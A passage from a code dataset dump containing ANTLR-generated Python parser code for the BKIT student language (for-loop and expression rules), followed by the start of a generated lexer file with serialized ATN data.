self._input.LA(1)\n if (((_la) & ~0x3f) == 0 and ((1 << _la) & ((1 << BKITParser.ID) | (1 << BKITParser.INT_LIT) | (1 << BKITParser.FLOAT_LIT) | (1 << BKITParser.BOOL_LIT) | (1 << BKITParser.STRING_LIT) | (1 << BKITParser.MINUS_INT) | (1 << BKITParser.MINUS_FLOAT) | (1 << BKITParser.NOT) | (1 << BKITParser.LEFT_PAREN) | (1 << BKITParser.LEFT_BRACE))) != 0):\n self.state = 328\n self.expr()\n\n\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Init_forContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def scalar_var(self):\n return self.getTypedRuleContext(BKITParser.Scalar_varContext,0)\n\n\n def ASSIGN(self):\n return self.getToken(BKITParser.ASSIGN, 0)\n\n def expr(self):\n return self.getTypedRuleContext(BKITParser.ExprContext,0)\n\n\n def getRuleIndex(self):\n return BKITParser.RULE_init_for\n\n def accept(self, visitor:ParseTreeVisitor):\n if hasattr( visitor, \"visitInit_for\" ):\n return visitor.visitInit_for(self)\n else:\n return visitor.visitChildren(self)\n\n\n\n\n def init_for(self):\n\n localctx = BKITParser.Init_forContext(self, self._ctx, self.state)\n self.enterRule(localctx, 54, self.RULE_init_for)\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 331\n self.scalar_var()\n self.state = 332\n self.match(BKITParser.ASSIGN)\n self.state = 333\n self.expr()\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Con_forContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def expr(self):\n return self.getTypedRuleContext(BKITParser.ExprContext,0)\n\n\n def getRuleIndex(self):\n return BKITParser.RULE_con_for\n\n def accept(self, visitor:ParseTreeVisitor):\n if hasattr( visitor, \"visitCon_for\" ):\n return visitor.visitCon_for(self)\n else:\n return visitor.visitChildren(self)\n\n\n\n\n def con_for(self):\n\n localctx = BKITParser.Con_forContext(self, self._ctx, self.state)\n self.enterRule(localctx, 56, self.RULE_con_for)\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 335\n self.expr()\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Update_forContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def expr(self):\n return self.getTypedRuleContext(BKITParser.ExprContext,0)\n\n\n def getRuleIndex(self):\n return BKITParser.RULE_update_for\n\n def accept(self, visitor:ParseTreeVisitor):\n if hasattr( visitor, \"visitUpdate_for\" ):\n return visitor.visitUpdate_for(self)\n else:\n return visitor.visitChildren(self)\n\n\n\n\n def update_for(self):\n\n localctx = BKITParser.Update_forContext(self, self._ctx, self.state)\n self.enterRule(localctx, 58, self.RULE_update_for)\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 337\n self.expr()\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class ExprContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def expr1(self, i:int=None):\n if i is None:\n return self.getTypedRuleContexts(BKITParser.Expr1Context)\n else:\n return self.getTypedRuleContext(BKITParser.Expr1Context,i)\n\n\n def EQUAL(self):\n return self.getToken(BKITParser.EQUAL, 0)\n\n def NOT_EQUAL_INT(self):\n return self.getToken(BKITParser.NOT_EQUAL_INT, 0)\n\n def LESS_INT(self):\n return self.getToken(BKITParser.LESS_INT, 0)\n\n def GREATER_INT(self):\n return self.getToken(BKITParser.GREATER_INT, 0)\n\n def LESS_OR_EQUAL_INT(self):\n return self.getToken(BKITParser.LESS_OR_EQUAL_INT, 0)\n\n def GREATER_OR_EQUAL_INT(self):\n return self.getToken(BKITParser.GREATER_OR_EQUAL_INT, 0)\n\n def NOT_EQUAL_FLOAT(self):\n return self.getToken(BKITParser.NOT_EQUAL_FLOAT, 0)\n\n def LESS_FLOAT(self):\n return self.getToken(BKITParser.LESS_FLOAT, 0)\n\n def GREATER_FLOAT(self):\n return self.getToken(BKITParser.GREATER_FLOAT, 0)\n\n def LESS_OR_EQUAL_FLOAT(self):\n return self.getToken(BKITParser.LESS_OR_EQUAL_FLOAT, 0)\n\n def GREATER_OR_EQUAL_FLOAT(self):\n return self.getToken(BKITParser.GREATER_OR_EQUAL_FLOAT, 0)\n\n def getRuleIndex(self):\n return BKITParser.RULE_expr\n\n def accept(self, visitor:ParseTreeVisitor):\n if hasattr( visitor, \"visitExpr\" ):\n return visitor.visitExpr(self)\n else:\n return visitor.visitChildren(self)\n\n\n\n\n def expr(self):\n\n localctx = BKITParser.ExprContext(self, self._ctx, self.state)\n self.enterRule(localctx, 60, self.RULE_expr)\n self._la = 0 # Token type\n try:\n self.state = 344\n self._errHandler.sync(self)\n la_ = self._interp.adaptivePredict(self._input,27,self._ctx)\n if la_ == 1:\n self.enterOuterAlt(localctx, 1)\n self.state = 339\n self.expr1(0)\n self.state = 340\n _la = self._input.LA(1)\n if not((((_la) & ~0x3f) == 0 and ((1 << _la) & ((1 << BKITParser.EQUAL) | (1 << BKITParser.NOT_EQUAL_INT) | (1 << BKITParser.LESS_INT) | (1 << BKITParser.GREATER_INT) | (1 << BKITParser.LESS_OR_EQUAL_INT) | (1 << BKITParser.GREATER_OR_EQUAL_INT) | (1 << BKITParser.NOT_EQUAL_FLOAT) | (1 << BKITParser.LESS_FLOAT) | (1 << BKITParser.GREATER_FLOAT) | (1 << BKITParser.LESS_OR_EQUAL_FLOAT) | (1 << BKITParser.GREATER_OR_EQUAL_FLOAT))) != 0)):\n self._errHandler.recoverInline(self)\n else:\n self._errHandler.reportMatch(self)\n self.consume()\n self.state = 341\n self.expr1(0)\n pass\n\n elif la_ == 2:\n self.enterOuterAlt(localctx, 2)\n self.state = 343\n self.expr1(0)\n pass\n\n\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Expr1Context(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def expr2(self):\n return self.getTypedRuleContext(BKITParser.Expr2Context,0)\n\n\n def expr1(self):\n return self.getTypedRuleContext(BKITParser.Expr1Context,0)\n\n\n def AND(self):\n return self.getToken(BKITParser.AND, 0)\n\n def OR(self):\n return self.getToken(BKITParser.OR, 0)\n\n def getRuleIndex(self):\n return BKITParser.RULE_expr1\n\n def accept(self, visitor:ParseTreeVisitor):\n if hasattr( visitor, \"visitExpr1\" ):\n return visitor.visitExpr1(self)\n else:\n return visitor.visitChildren(self)\n\n\n\n def expr1(self, _p:int=0):\n _parentctx = self._ctx\n _parentState = self.state\n localctx = BKITParser.Expr1Context(self, self._ctx, _parentState)\n _prevctx = localctx\n _startState = 62\n self.enterRecursionRule(localctx, 62, self.RULE_expr1, _p)\n self._la = 0 # Token type\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 347\n self.expr2(0)\n self._ctx.stop = self._input.LT(-1)\n self.state = 354\n self._errHandler.sync(self)\n _alt = self._interp.adaptivePredict(self._input,28,self._ctx)\n while _alt!=2 and _alt!=ATN.INVALID_ALT_NUMBER:\n if _alt==1:\n if self._parseListeners is not None:\n self.triggerExitRuleEvent()\n _prevctx = localctx\n localctx = BKITParser.Expr1Context(self, _parentctx, _parentState)\n self.pushNewRecursionContext(localctx, _startState, self.RULE_expr1)\n self.state = 349\n if not self.precpred(self._ctx, 2):\n from antlr4.error.Errors import FailedPredicateException\n raise FailedPredicateException(self, \"self.precpred(self._ctx, 2)\")\n self.state = 350\n _la = self._input.LA(1)\n if not(_la==BKITParser.AND or _la==BKITParser.OR):\n self._errHandler.recoverInline(self)\n else:\n self._errHandler.reportMatch(self)\n self.consume()\n self.state = 351\n self.expr2(0) \n self.state = 356\n self._errHandler.sync(self)\n _alt = self._interp.adaptivePredict(self._input,28,self._ctx)\n\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.unrollRecursionContexts(_parentctx)\n return localctx\n\n\n class Expr2Context(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def expr3(self):\n return self.getTypedRuleContext(BKITParser.Expr3Context,0)\n\n\n def expr2(self):\n return self.getTypedRuleContext(BKITParser.Expr2Context,0)\n\n\n def PLUS_FLOAT(self):\n return self.getToken(BKITParser.PLUS_FLOAT, 0)\n\n def PLUS_INT(self):\n return self.getToken(BKITParser.PLUS_INT, 0)\n\n def MINUS_FLOAT(self):\n return self.getToken(BKITParser.MINUS_FLOAT, 0)\n\n def MINUS_INT(self):\n return self.getToken(BKITParser.MINUS_INT, 0)\n\n def getRuleIndex(self):\n return BKITParser.RULE_expr2\n\n def accept(self, visitor:ParseTreeVisitor):\n if hasattr( visitor, \"visitExpr2\" ):\n return visitor.visitExpr2(self)\n else:\n return visitor.visitChildren(self)\n\n\n\n def expr2(self, _p:int=0):\n _parentctx = self._ctx\n _parentState = self.state\n localctx = BKITParser.Expr2Context(self, self._ctx, _parentState)\n _prevctx = localctx\n _startState = 64\n self.enterRecursionRule(localctx, 64, self.RULE_expr2, _p)\n self._la = 0 # Token type\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 358\n self.expr3(0)\n self._ctx.stop = self._input.LT(-1)\n self.state = 365\n self._errHandler.sync(self)\n _alt = self._interp.adaptivePredict(self._input,29,self._ctx)\n while _alt!=2 and _alt!=ATN.INVALID_ALT_NUMBER:\n if _alt==1:\n if self._parseListeners is not None:\n self.triggerExitRuleEvent()\n _prevctx = localctx\n localctx = BKITParser.Expr2Context(self, _parentctx, _parentState)\n self.pushNewRecursionContext(localctx, _startState, self.RULE_expr2)\n self.state = 360\n if not self.precpred(self._ctx, 2):\n from antlr4.error.Errors import FailedPredicateException\n raise FailedPredicateException(self, \"self.precpred(self._ctx, 2)\")\n self.state = 361\n _la = self._input.LA(1)\n if not((((_la) & ~0x3f) == 0 and ((1 << _la) & ((1 << BKITParser.PLUS_INT) | (1 << BKITParser.PLUS_FLOAT) | (1 << BKITParser.MINUS_INT) | (1 << BKITParser.MINUS_FLOAT))) != 0)):\n self._errHandler.recoverInline(self)\n else:\n self._errHandler.reportMatch(self)\n self.consume()\n self.state = 362\n self.expr3(0) \n self.state = 367\n self._errHandler.sync(self)\n _alt = self._interp.adaptivePredict(self._input,29,self._ctx)\n\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.unrollRecursionContexts(_parentctx)\n return localctx\n\n\n class Expr3Context(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def expr4(self):\n return self.getTypedRuleContext(BKITParser.Expr4Context,0)\n\n\n def expr3(self):\n return self.getTypedRuleContext(BKITParser.Expr3Context,0)\n\n\n def STAR_INT(self):\n return self.getToken(BKITParser.STAR_INT, 0)\n\n def STAR_FLOAT(self):\n return self.getToken(BKITParser.STAR_FLOAT, 0)\n\n def DIV_FLOAT(self):\n return self.getToken(BKITParser.DIV_FLOAT, 0)\n\n def DIV_INT(self):\n return self.getToken(BKITParser.DIV_INT, 0)\n\n def MOD(self):\n return self.getToken(BKITParser.MOD, 0)\n\n def getRuleIndex(self):\n return BKITParser.RULE_expr3\n\n def accept(self, visitor:ParseTreeVisitor):\n if hasattr( visitor, \"visitExpr3\" ):\n return visitor.visitExpr3(self)\n else:\n return visitor.visitChildren(self)\n\n\n\n def expr3(self, _p:int=0):\n _parentctx = self._ctx\n _parentState = self.state\n localctx = BKITParser.Expr3Context(self, self._ctx, _parentState)\n _prevctx = localctx\n _startState = 66\n self.enterRecursionRule(localctx, 66, self.RULE_expr3, _p)\n self._la = 0 # Token type\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 369\n self.expr4()\n self._ctx.stop = self._input.LT(-1)\n self.state = 376\n self._errHandler.sync(self)\n _alt = self._interp.adaptivePredict(self._input,30,self._ctx)\n while _alt!=2 and _alt!=ATN.INVALID_ALT_NUMBER:\n if _alt==1:\n if self._parseListeners is not None:\n self.triggerExitRuleEvent()\n _prevctx = localctx\n localctx = BKITParser.Expr3Context(self, _parentctx, _parentState)\n self.pushNewRecursionContext(localctx, _startState, self.RULE_expr3)\n self.state = 371\n if not self.precpred(self._ctx, 2):\n from antlr4.error.Errors import FailedPredicateException\n raise FailedPredicateException(self, \"self.precpred(self._ctx, 2)\")\n self.state = 372\n _la = self._input.LA(1)\n if not((((_la) & ~0x3f) == 0 and ((1 << _la) & ((1 << BKITParser.STAR_INT) | (1 << BKITParser.STAR_FLOAT) | (1 << BKITParser.DIV_INT) | (1 << BKITParser.DIV_FLOAT) | (1 << BKITParser.MOD))) != 0)):\n self._errHandler.recoverInline(self)\n else:\n self._errHandler.reportMatch(self)\n self.consume()\n self.state = 373\n self.expr4() \n self.state = 378\n self._errHandler.sync(self)\n _alt = self._interp.adaptivePredict(self._input,30,self._ctx)\n\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.unrollRecursionContexts(_parentctx)\n return localctx\n\n\n class Expr4Context(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def NOT(self):\n return self.getToken(BKITParser.NOT, 0)\n\n def expr4(self):\n return self.getTypedRuleContext(BKITParser.Expr4Context,0)\n\n\n def expr5(self):\n return self.getTypedRuleContext(BKITParser.Expr5Context,0)\n\n\n def getRuleIndex(self):\n return BKITParser.RULE_expr4\n\n def accept(self, visitor:ParseTreeVisitor):\n if hasattr( visitor, \"visitExpr4\" ):\n return visitor.visitExpr4(self)\n else:\n return visitor.visitChildren(self)\n\n\n\n\n def expr4(self):\n\n localctx = BKITParser.Expr4Context(self, self._ctx, self.state)\n self.enterRule(localctx, 68, self.RULE_expr4)\n try:\n self.state = 382\n self._errHandler.sync(self)\n token = self._input.LA(1)\n if token in [BKITParser.NOT]:\n self.enterOuterAlt(localctx, 1)\n self.state = 379\n self.match(BKITParser.NOT)\n self.state = 380\n self.expr4()\n pass\n elif token in [BKITParser.ID, BKITParser.INT_LIT, BKITParser.FLOAT_LIT, BKITParser.BOOL_LIT, BKITParser.STRING_LIT, BKITParser.MINUS_INT, BKITParser.MINUS_FLOAT, BKITParser.LEFT_PAREN, BKITParser.LEFT_BRACE]:\n self.enterOuterAlt(localctx, 2)\n self.state = 381\n self.expr5()\n pass\n else:\n raise NoViableAltException(self)\n\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Expr5Context(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def expr5(self):\n return self.getTypedRuleContext(BKITParser.Expr5Context,0)\n\n\n def MINUS_FLOAT(self):\n return self.getToken(BKITParser.MINUS_FLOAT, 0)\n\n def MINUS_INT(self):\n return self.getToken(BKITParser.MINUS_INT, 0)\n\n def expr6(self):\n return self.getTypedRuleContext(BKITParser.Expr6Context,0)\n\n\n def getRuleIndex(self):\n return BKITParser.RULE_expr5\n\n def accept(self, visitor:ParseTreeVisitor):\n if hasattr( visitor, \"visitExpr5\" ):\n return visitor.visitExpr5(self)\n else:\n return visitor.visitChildren(self)\n\n\n\n\n def expr5(self):\n\n localctx = BKITParser.Expr5Context(self, self._ctx, self.state)\n self.enterRule(localctx, 70, self.RULE_expr5)\n self._la = 0 # Token type\n try:\n self.state = 387\n self._errHandler.sync(self)\n token = self._input.LA(1)\n if token in [BKITParser.MINUS_INT, BKITParser.MINUS_FLOAT]:\n self.enterOuterAlt(localctx, 1)\n self.state = 384\n _la = self._input.LA(1)\n if not(_la==BKITParser.MINUS_INT or _la==BKITParser.MINUS_FLOAT):\n self._errHandler.recoverInline(self)\n else:\n self._errHandler.reportMatch(self)\n self.consume()\n self.state = 385\n self.expr5()\n pass\n elif token in [BKITParser.ID, BKITParser.INT_LIT, BKITParser.FLOAT_LIT, BKITParser.BOOL_LIT, BKITParser.STRING_LIT, BKITParser.LEFT_PAREN, BKITParser.LEFT_BRACE]:\n self.enterOuterAlt(localctx, 2)\n self.state = 386\n self.expr6()\n pass\n else:\n raise NoViableAltException(self)\n\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Expr6Context(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def expr7(self):\n return self.getTypedRuleContext(BKITParser.Expr7Context,0)\n\n\n def index_op(self):\n return self.getTypedRuleContext(BKITParser.Index_opContext,0)\n\n\n def getRuleIndex(self):\n return BKITParser.RULE_expr6\n\n def accept(self, visitor:ParseTreeVisitor):\n if hasattr( visitor, \"visitExpr6\" ):\n return visitor.visitExpr6(self)\n else:\n return visitor.visitChildren(self)\n\n\n\n\n def expr6(self):\n\n localctx = BKITParser.Expr6Context(self, self._ctx, self.state)\n self.enterRule(localctx, 72, self.RULE_expr6)\n try:\n self.state = 393\n self._errHandler.sync(self)\n la_ = self._interp.adaptivePredict(self._input,33,self._ctx)\n if la_ == 1:\n self.enterOuterAlt(localctx, 1)\n self.state = 389\n self.expr7()\n self.state = 390\n self.index_op()\n pass\n\n elif la_ == 2:\n self.enterOuterAlt(localctx, 2)\n self.state = 392\n self.expr7()\n pass\n\n\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Expr7Context(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def function_call(self):\n return self.getTypedRuleContext(BKITParser.Function_callContext,0)\n\n\n def expr8(self):\n return self.getTypedRuleContext(BKITParser.Expr8Context,0)\n\n\n def getRuleIndex(self):\n return BKITParser.RULE_expr7\n\n def accept(self, visitor:ParseTreeVisitor):\n if hasattr( visitor, \"visitExpr7\" ):\n return visitor.visitExpr7(self)\n else:\n return visitor.visitChildren(self)\n\n\n\n\n def expr7(self):\n\n localctx = BKITParser.Expr7Context(self, self._ctx, self.state)\n self.enterRule(localctx, 74, self.RULE_expr7)\n try:\n self.state = 397\n self._errHandler.sync(self)\n la_ = self._interp.adaptivePredict(self._input,34,self._ctx)\n if la_ == 1:\n self.enterOuterAlt(localctx, 1)\n self.state = 395\n self.function_call()\n pass\n\n elif la_ == 2:\n self.enterOuterAlt(localctx, 2)\n self.state = 396\n self.expr8()\n pass\n\n\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Expr8Context(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def operand(self):\n return self.getTypedRuleContext(BKITParser.OperandContext,0)\n\n\n def LEFT_PAREN(self):\n return self.getToken(BKITParser.LEFT_PAREN, 0)\n\n def expr(self):\n return self.getTypedRuleContext(BKITParser.ExprContext,0)\n\n\n def RIGHT_PAREN(self):\n return self.getToken(BKITParser.RIGHT_PAREN, 0)\n\n def getRuleIndex(self):\n return BKITParser.RULE_expr8\n\n def accept(self, visitor:ParseTreeVisitor):\n if hasattr( visitor, \"visitExpr8\" ):\n return visitor.visitExpr8(self)\n else:\n return visitor.visitChildren(self)\n\n\n\n\n def expr8(self):\n\n localctx = BKITParser.Expr8Context(self, self._ctx, self.state)\n self.enterRule(localctx, 76, self.RULE_expr8)\n try:\n self.state = 404\n self._errHandler.sync(self)\n token = self._input.LA(1)\n if token in [BKITParser.ID, BKITParser.INT_LIT, BKITParser.FLOAT_LIT, BKITParser.BOOL_LIT, BKITParser.STRING_LIT, BKITParser.LEFT_BRACE]:\n self.enterOuterAlt(localctx, 1)\n self.state = 399\n self.operand()\n pass\n elif token in [BKITParser.LEFT_PAREN]:\n self.enterOuterAlt(localctx, 2)\n self.state = 400\n self.match(BKITParser.LEFT_PAREN)\n self.state = 401\n self.expr()\n self.state = 402\n self.match(BKITParser.RIGHT_PAREN)\n pass\n else:\n raise NoViableAltException(self)\n\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class OperandContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def var_non_init(self):\n return self.getTypedRuleContext(BKITParser.Var_non_initContext,0)\n\n\n def primitive_data(self):\n return self.getTypedRuleContext(BKITParser.Primitive_dataContext,0)\n\n\n def composite_data(self):\n return self.getTypedRuleContext(BKITParser.Composite_dataContext,0)\n\n\n def getRuleIndex(self):\n return BKITParser.RULE_operand\n\n def accept(self, visitor:ParseTreeVisitor):\n if hasattr( visitor, \"visitOperand\" ):\n return visitor.visitOperand(self)\n else:\n return visitor.visitChildren(self)\n\n\n\n\n def operand(self):\n\n localctx = BKITParser.OperandContext(self, self._ctx, self.state)\n self.enterRule(localctx, 78, self.RULE_operand)\n try:\n self.state = 409\n self._errHandler.sync(self)\n token = self._input.LA(1)\n if token in [BKITParser.ID]:\n self.enterOuterAlt(localctx, 1)\n self.state = 406\n self.var_non_init()\n pass\n elif token in [BKITParser.INT_LIT, BKITParser.FLOAT_LIT, BKITParser.BOOL_LIT, BKITParser.STRING_LIT]:\n self.enterOuterAlt(localctx, 2)\n self.state = 407\n self.primitive_data()\n pass\n elif token in [BKITParser.LEFT_BRACE]:\n self.enterOuterAlt(localctx, 3)\n self.state = 408\n self.composite_data()\n pass\n else:\n raise NoViableAltException(self)\n\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Function_callContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def ID(self):\n return self.getToken(BKITParser.ID, 0)\n\n def LEFT_PAREN(self):\n return self.getToken(BKITParser.LEFT_PAREN, 0)\n\n def RIGHT_PAREN(self):\n return self.getToken(BKITParser.RIGHT_PAREN, 0)\n\n def expr(self, i:int=None):\n if i is None:\n return self.getTypedRuleContexts(BKITParser.ExprContext)\n else:\n return self.getTypedRuleContext(BKITParser.ExprContext,i)\n\n\n def COMMA(self, i:int=None):\n if i is None:\n return self.getTokens(BKITParser.COMMA)\n else:\n return self.getToken(BKITParser.COMMA, i)\n\n def getRuleIndex(self):\n return BKITParser.RULE_function_call\n\n def accept(self, visitor:ParseTreeVisitor):\n if hasattr( visitor, \"visitFunction_call\" ):\n return visitor.visitFunction_call(self)\n else:\n return visitor.visitChildren(self)\n\n\n\n\n def function_call(self):\n\n localctx = BKITParser.Function_callContext(self, self._ctx, self.state)\n self.enterRule(localctx, 80, self.RULE_function_call)\n self._la = 0 # Token type\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 411\n self.match(BKITParser.ID)\n self.state = 412\n self.match(BKITParser.LEFT_PAREN)\n self.state = 423\n self._errHandler.sync(self)\n _la = self._input.LA(1)\n while (((_la) & ~0x3f) == 0 and ((1 << _la) & ((1 << BKITParser.ID) | (1 << BKITParser.INT_LIT) | (1 << BKITParser.FLOAT_LIT) | (1 << BKITParser.BOOL_LIT) | (1 << BKITParser.STRING_LIT) | (1 << BKITParser.MINUS_INT) | (1 << BKITParser.MINUS_FLOAT) | (1 << BKITParser.NOT) | (1 << BKITParser.LEFT_PAREN) | (1 << BKITParser.LEFT_BRACE))) != 0):\n self.state = 413\n self.expr()\n self.state = 418\n self._errHandler.sync(self)\n _la = self._input.LA(1)\n while _la==BKITParser.COMMA:\n self.state = 414\n self.match(BKITParser.COMMA)\n self.state = 415\n self.expr()\n self.state = 420\n self._errHandler.sync(self)\n _la = self._input.LA(1)\n\n self.state = 425\n self._errHandler.sync(self)\n _la = self._input.LA(1)\n\n self.state = 426\n self.match(BKITParser.RIGHT_PAREN)\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Index_opContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def LEFT_BRACKET(self):\n return self.getToken(BKITParser.LEFT_BRACKET, 0)\n\n def expr(self):\n return self.getTypedRuleContext(BKITParser.ExprContext,0)\n\n\n def RIGHT_BRACKET(self):\n return self.getToken(BKITParser.RIGHT_BRACKET, 0)\n\n def index_op(self):\n return self.getTypedRuleContext(BKITParser.Index_opContext,0)\n\n\n def getRuleIndex(self):\n return BKITParser.RULE_index_op\n\n def accept(self, visitor:ParseTreeVisitor):\n if hasattr( visitor, \"visitIndex_op\" ):\n return visitor.visitIndex_op(self)\n else:\n return visitor.visitChildren(self)\n\n\n\n\n def index_op(self):\n\n localctx = BKITParser.Index_opContext(self, self._ctx, self.state)\n self.enterRule(localctx, 82, self.RULE_index_op)\n try:\n self.state = 437\n self._errHandler.sync(self)\n la_ = self._interp.adaptivePredict(self._input,39,self._ctx)\n if la_ == 1:\n self.enterOuterAlt(localctx, 1)\n self.state = 428\n self.match(BKITParser.LEFT_BRACKET)\n self.state = 429\n self.expr()\n self.state = 430\n self.match(BKITParser.RIGHT_BRACKET)\n pass\n\n elif la_ == 2:\n self.enterOuterAlt(localctx, 2)\n self.state = 432\n self.match(BKITParser.LEFT_BRACKET)\n self.state = 433\n self.expr()\n self.state = 434\n self.match(BKITParser.RIGHT_BRACKET)\n self.state = 435\n self.index_op()\n pass\n\n\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n\n def sempred(self, localctx:RuleContext, ruleIndex:int, predIndex:int):\n if self._predicates == None:\n self._predicates = dict()\n self._predicates[31] = self.expr1_sempred\n self._predicates[32] = self.expr2_sempred\n self._predicates[33] = self.expr3_sempred\n pred = self._predicates.get(ruleIndex, None)\n if pred is None:\n raise Exception(\"No predicate with index:\" + str(ruleIndex))\n else:\n return pred(localctx, predIndex)\n\n def expr1_sempred(self, localctx:Expr1Context, predIndex:int):\n if predIndex == 0:\n return self.precpred(self._ctx, 2)\n \n\n def expr2_sempred(self, localctx:Expr2Context, predIndex:int):\n if predIndex == 1:\n return self.precpred(self._ctx, 2)\n \n\n def expr3_sempred(self, localctx:Expr3Context, predIndex:int):\n if predIndex == 2:\n return self.precpred(self._ctx, 2)\n \n\n\n\n\n" }, { "alpha_fraction": 0.3054637908935547, "alphanum_fraction": 0.5634900331497192, "avg_line_length": 56.85784149169922, "blob_id": "85bded2862d03d7ed1c6bfcb94b370a1ccea596d", "content_id": "a35bba8633281ffb7afc944e98c7bb0b934e6e19", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 11805, "license_type": "no_license", "max_line_length": 113, "num_lines": 204, "path": "/LexicalAnalysis/src/main/bkit/parser/.antlr/BKITLexer.py", "repo_name": "signofthefour/PPL", "src_encoding": "UTF-8", "text": "# Generated from /home/nguyendat/Documents/projects/PPL/LexicalAnalysis/src/main/bkit/parser/BKIT.g4 by ANTLR 4.8\nfrom antlr4 import *\nfrom io import StringIO\nfrom typing.io import TextIO\nimport sys\n\n\nfrom lexererr import *\n\n\n\ndef serializedATN():\n with StringIO() as buf:\n buf.write(\"\\3\\u608b\\ua72a\\u8133\\ub9ed\\u417c\\u3be7\\u7786\\u5964\\2\\22\")\n buf.write(\"\\u0110\\b\\1\\4\\2\\t\\2\\4\\3\\t\\3\\4\\4\\t\\4\\4\\5\\t\\5\\4\\6\\t\\6\\4\\7\")\n buf.write(\"\\t\\7\\4\\b\\t\\b\\4\\t\\t\\t\\4\\n\\t\\n\\4\\13\\t\\13\\4\\f\\t\\f\\4\\r\\t\\r\")\n buf.write(\"\\4\\16\\t\\16\\4\\17\\t\\17\\4\\20\\t\\20\\4\\21\\t\\21\\4\\22\\t\\22\\4\\23\")\n buf.write(\"\\t\\23\\4\\24\\t\\24\\4\\25\\t\\25\\4\\26\\t\\26\\4\\27\\t\\27\\4\\30\\t\\30\")\n buf.write(\"\\4\\31\\t\\31\\4\\32\\t\\32\\4\\33\\t\\33\\4\\34\\t\\34\\4\\35\\t\\35\\4\\36\")\n buf.write(\"\\t\\36\\4\\37\\t\\37\\4 \\t 